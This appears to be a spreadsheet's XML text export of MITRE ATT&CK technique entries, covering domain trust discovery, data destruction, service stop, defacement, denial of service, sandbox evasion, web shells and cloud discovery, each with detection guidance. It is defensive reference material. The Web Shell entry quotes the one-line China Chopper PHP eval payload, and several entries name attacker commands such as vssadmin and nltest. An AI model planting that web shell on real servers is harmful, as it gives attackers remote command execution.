Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity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environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">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such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)
</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</si>
  <si>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Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: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t>
  </si>
  <si>
    <t>Group Policy Modification</t>
  </si>
  <si>
    <t xml:space="preserve">It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
* Event ID 5136 - A directory service object was modified
* Event ID 5137 - A directory service object was created
* Event ID 5138 - A directory service object was undeleted
* Event ID 5139 - A directory service object was moved
* Event ID 5141 - A directory service object was deleted
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). </t>
  </si>
  <si>
    <t xml:space="preserve">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predicable network path &lt;code&gt;\\&amp;lt;DOMAIN&amp;gt;\SYSVOL\&amp;lt;DOMAIN&amp;gt;\Policies\&lt;/code&gt;.(Citation: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Execution](https://attack.mitre.org/techniques/T1035),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
</t>
  </si>
  <si>
    <t>System access controls,File system access controls</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under &lt;code&gt;C:\Windows\System32\&lt;/code&gt;.</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</si>
  <si>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Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002)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2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>impact</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
In some cases, monitoring for unusual kernel driver installation activity can aid in detection.</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</si>
  <si>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[OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Windows Registry,API monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Monitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services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 (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)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t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>Packet capture,Web application firewall logs,Web logs,Packet capture</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. 
</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>Web logs,Web application firewall logs,Packet capture</t>
  </si>
  <si>
    <t>Monitor internal and websites for unplanned content changes. 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</si>
  <si>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An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>External Defacement</t>
  </si>
  <si>
    <t>Monitor external websites for unplanned content changes. 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</si>
  <si>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An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing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[External Defacement](https://attack.mitre.org/techniques/T1491/002)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t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>BIOS,Component firmware</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</t>
  </si>
  <si>
    <t>Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. 
One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t>Virtualization, sandbox, user activity, and related discovery techniques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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various means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 
Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)
</t>
  </si>
  <si>
    <t>defense-evasion,discovery</t>
  </si>
  <si>
    <t>Anti-virus,Host forensic analysis,Signature-based detection,Static File Analysis</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>System Checks</t>
  </si>
  <si>
    <t>Virtualization/sandbox related system checks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t>
  </si>
  <si>
    <t>Adversaries may employ various system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 
Specific checks may will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. 
Checks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. 
Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. 
Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>Static File Analysis,Signature-based detection,Host forensic analysis,Anti-virus</t>
  </si>
  <si>
    <t>T1497.002</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t>Process command-line parameters,Process use of network</t>
  </si>
  <si>
    <t xml:space="preserve">User activity-based checks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 </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various user activity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 
Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) </t>
  </si>
  <si>
    <t>Anti-virus,Static File Analysis,Signature-based detection,Host forensic analysis</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>Time Based Evasion</t>
  </si>
  <si>
    <t xml:space="preserve">Time-based evasion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 </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. </t>
  </si>
  <si>
    <t>Host forensic analysis,Signature-based detection,Static File Analysis,Anti-virus</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure AD,SaaS,Azure,Office 365</t>
  </si>
  <si>
    <t>Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</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</si>
  <si>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For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
Botnets are commonly used to conduct network flooding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distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>macOS,Windows,Linux,AWS,Office 365,Azure AD,GCP,Azure,SaaS</t>
  </si>
  <si>
    <t>Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)
Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Network device logs,Netflow/Enclave netflow,Network intrusion detection system,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.</t>
  </si>
  <si>
    <t>Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.
Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)
ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)
Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>Network device logs,Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.</t>
  </si>
  <si>
    <t>Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Process monitoring,File monitoring,Application logs</t>
  </si>
  <si>
    <t xml:space="preserve">Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.
Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </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</si>
  <si>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t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>Application logs</t>
  </si>
  <si>
    <t>On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).
Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) 
Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) </t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>Application logs,File monitoring</t>
  </si>
  <si>
    <t>Linux,Windows</t>
  </si>
  <si>
    <t>Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. </t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>Process monitoring,Netflow/Enclave netflow,File monitoring,Authentication logs</t>
  </si>
  <si>
    <t xml:space="preserve">Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) 
&lt;code&gt;&amp;lt;?php @eval($_POST['password']);&amp;gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may backdoor web servers with web shells to establish persistent access to systems. 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(ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) </t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,Process command-line parameters,Process monitoring,File monitoring</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</si>
  <si>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</si>
  <si>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Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,File monitoring,Process monitoring,Process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</si>
  <si>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In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules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cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>Implant Container Image</t>
  </si>
  <si>
    <t>File monitoring,Asset management</t>
  </si>
  <si>
    <t>GCP,Azure,AWS</t>
  </si>
  <si>
    <t>Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may implant cloud container images with malicious code to establish persistence. Amazon Web Service (AWS) Amazon Machine Images (AMI), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored.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attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) Adversaries may also implant Docker images that may be inadvertently used in cloud deployments, which has been reported in some instances of cryptomining botnets.(Citation: ATT Cybersecurity Cryptocurrency Attacks on Cloud) </t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Azure AD,Office 365,SaaS</t>
  </si>
  <si>
    <t>Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.</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</si>
  <si>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Azure AD, etc. 
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
